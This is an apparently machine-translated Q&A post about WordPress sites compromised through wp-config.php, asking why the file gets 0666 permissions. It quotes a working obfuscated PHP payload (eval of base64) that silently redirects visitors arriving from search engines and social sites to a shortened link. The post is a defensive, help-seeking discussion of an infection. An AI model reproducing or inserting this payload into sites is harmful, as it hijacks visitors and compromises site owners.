Wp-config.php的默认安装权限

时间:2013-01-14 作者:Matteo

最近我注意到,我们在服务器上安装的许多wordpress都受到了这种东西的攻击和攻击

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9iaXQubHkvVVlJZFhMIik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"));
此恶意代码将来自facebook和google+等社交网络的用户重定向到广告页面。

分析安装中的文件,我们发现wp-config.php 拥有太多的打开权限(0666)。

wordpress github存储库显示,这个问题大约从2003年就存在了!

为什么用0666而不是0600保存文件?

有什么实际需要吗?

1 个回复
SO网友:fuxia

web安装程序将配置数据写入该文件。它需要写访问权限。

我不认为这是你的后门。可能有一个插件或timthumb的旧主题存在漏洞。

结束
标签: security   permissions   wp-config   小码农  

相关推荐

WP_SignOn显示错误_PUNITED_PERMISSIONS

这对我来说似乎很奇怪,因为如果你正在登录一个用户,你不应该已经登录了。。。因此,您的权限应该无关紧要。这可能是一种有点奇怪的方式,所以这可能会导致问题。代码如下:function login( $user_name, $password ) { $creds = array(); $creds[\'user_login\'] = $user_name; $creds[\'user_password\'] = $password; $creds